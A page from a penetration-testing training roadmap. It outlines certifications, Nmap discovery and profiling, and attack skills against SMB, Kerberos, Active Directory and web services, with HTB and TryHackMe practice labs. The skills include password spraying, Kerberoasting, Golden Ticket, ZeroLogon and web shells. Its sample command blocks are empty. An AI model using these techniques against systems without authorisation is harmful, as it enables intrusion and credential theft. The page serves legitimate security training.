THE CU
  • Home
  • Blogs
  • Offense
    • Pen Tester Training Program
    • Offensive Cheat Sheets >
      • Bash Commands
      • Network Enumeration
      • Web Enumeration
      • Windows Post Ex
      • Metasploit
      • Shells
      • PowerShell
    • Offensive Links
  • Defense
    • Junior SOC Analyst Roadmap
    • Intermediate SOC Analyst Training Program
    • Defense Links
    • RDP Analysis
  • Land A Job
    • Entry-Level InfoSec Jobs
    • Improve Resume
    • Find a Job
    • Interview Prep
    • Grow as a Practitioner
    • Get Experience
  • FAQS
  • Other
    • Certifications
    • Finance, Travel, and Mental HealthBooks
    • Finance Resources
    • Infosec Conferences
    • CTFs
    • Cyber Ranges
    • Twitter People to Follow
    • Podcasts
    • Books
    • Twitch Streamers

Pen Tester Training Program

​Disclaimer: Use this information only in a controlled manner and only on systems you have permission to use. Any illegal use is your responsibility as is learning the laws in your country, state, province or county and abiding by them.
Another free training program from the mind at The  Cyber Union. This free resource is meant for those looking to get into penetration testing and have no idea where to start. The program will contain resources on topics that I believe to be real world applicable.
​
Like the analyst program this will be continuously built over time as I come across resources on specific topics. Enjoy and let me know what you think.

Certification Road Map

Last Update: 10/23/2021
​
Based on the exams I have taken or the study guides I have read through, the following path is what I would take if I were to go back in time and start over. Others may suggest different certifications and different orders, which is cool. But for me, this would be the most efficient chain. I will update it as I come across new materials.
Picture

Starting Point

TryHackMe - Complete Beginner Learning Path
​In my opinion, TryHackMe is a much easier starting point then HackTheBox. The content creators do a good job of making the skillsets more accessible to beginners with zero knowledge. One warning is that, access to the path is not free but requires you to sign up for the subscription at $10 USD a month. On the upside, you do get a certificate for completing the path. This can be added to your resume to help you land an interview.

Areas of Study

Discovery

This is a simple concept. Figure out what targets are reachable from where you are at. Nmap is your friend for this stage. Simply scan the /24 subnet to get started in a CTF environment. If you are on a real-life engagement, the customer will most likely let you know what your target ranges are.
Sample Nmap Commands

    
You may run into instances where every host responds back or nothing responds back all though there should be some live hosts. In this case, try running different types of scan such as an Echo Scan.

    

Profiling

This scan is meant to discover listening services on your live hosts. The reason these are separate steps, is because its faster in my personal experience. When you are running a large scan, such as combining discover and profiling, and something happens, you have to restart all your efforts. This could mean hours of work. If you do them one piece at a time, there is much less work you have to redo.

Some pen testers get pretty crazy with their profiling scan, which is cool but most of the time a simple scan works great.

    
This scan will enumerate all TCP ports, a handful of UDP ports, the OS, service versions, and disable the ping sweep. Pretty much everything you need. Notice that I fed it a list of live hosts with the -iL switch. I got these hosts from the discovery scan with some simple commandline fu.

    
You may be saying, "Silverbits, f that. I want to do it with one command." Ok go for it. In your practice lab, there is no reason to split this up.

    

Services

Understanding services, how they work, and how to connect to them is a fundamental part of any pen testers tool kit. Below are the top services that I look at in customer environments.

SMB/NetBios

Service Message Block (SMB) is one of the most common services in an environment. There will almost always be shares on a network and the associated ports (139, 445) are often open. If you can connect to these, you can gather loads of intel and perhaps gain an initial foothold.
Skills To Learn:
  • Connect to share
  • Mount share
  • Use PsExec
  • Null Sessions
  • Retrieve password policy
  • Password spraying
Practice Labs
HTB-Monteverde
  • Practice NULL sessions (enum4linux, smbclient, smbmap)
  • Practice password bruteforcing (Metasploit:smb_login)
  • Practice mounting shares
  • Practice browsing shares using smbclient and smbmap
HTB-Resolute
  • Practice Nmap Profiling scan
  • Practice NULL sessions (enum4linux, smbclient, smbmap)
  • Practice password bruteforcing (Metasploit:smb_login)

​Practice NULL sessions (enum4linux, smbclient, smbmap)
Practice NULL sessions (enum4linux, smbclient, smbmap)

Kerberos

Kerberos is available in pretty much every business environment today. If you can understand how the service works and how you can manipulate it, you will have a very handy tool in your box.
Skills To Learn:
  • Kerberoasting
  • AS-REP Roasting
  • Golden/Silver Ticket Attacks
  • Pass the Ticket
  • Skeleton key Attack
  • Blood Hound
  • Using a ticket in Linux
Videos
 Kerberos Authentication Explained | A deep dive by Destination Certification
Practice Labs
HTB-Blackfield
  • Practice checking for preauthentication with Impackets GetNPUsers.py
  • Practice cracking the krb4asrep hash with hashcat or JohnTheRipper
TryHackMe-​Attacking Kerberos
  • Practice with all the basic Kerberos attacks: Kerberoasting, AS-REP Roasting, Golden/Silver Ticket Attacks, Pass the Ticket, and Skeleton key

Active Directory

Like Kerberos, Active Directory is integral to virtually every business environment you will see as a pen tester. Understanding how to navigate the structure, and interact with users and devices via Active Directory is an amazing skill to have.
Skills To Learn:
  • GPO
  • BloodHound
  • Domain Hierarchy
  • Adding/modifying users and group memberships
  • Domain Trusts
  • GPP Attack
  • ZeroLogon
Practice Labs
HTB Track - Active Directory 101
  • Work through all the boxes in this track
  • Don't be ashamed to use walkthroughs. These labs are meant to teach you what is possible. Learn the tricks, document, and try to do it on your own next time you come across it.

Web

Web services are another no brainer to learn. Even if you don't become a master of web attacks, understanding the basics of web services can take you far.
Skills To Learn:
  • Directory Bruteforcing
  • Web Shells
  • Basic XSS
  • Basic SQLi
  • Command Injection
  • Remote Code Execution
  • Setting up a web service
  • Understanding permissions of web service
Home      Blogs    Disclaimers    Copyright Notice   Cookie Policy ​
  • Home
  • Blogs
  • Offense
    • Pen Tester Training Program
    • Offensive Cheat Sheets >
      • Bash Commands
      • Network Enumeration
      • Web Enumeration
      • Windows Post Ex
      • Metasploit
      • Shells
      • PowerShell
    • Offensive Links
  • Defense
    • Junior SOC Analyst Roadmap
    • Intermediate SOC Analyst Training Program
    • Defense Links
    • RDP Analysis
  • Land A Job
    • Entry-Level InfoSec Jobs
    • Improve Resume
    • Find a Job
    • Interview Prep
    • Grow as a Practitioner
    • Get Experience
  • FAQS
  • Other
    • Certifications
    • Finance, Travel, and Mental HealthBooks
    • Finance Resources
    • Infosec Conferences
    • CTFs
    • Cyber Ranges
    • Twitter People to Follow
    • Podcasts
    • Books
    • Twitch Streamers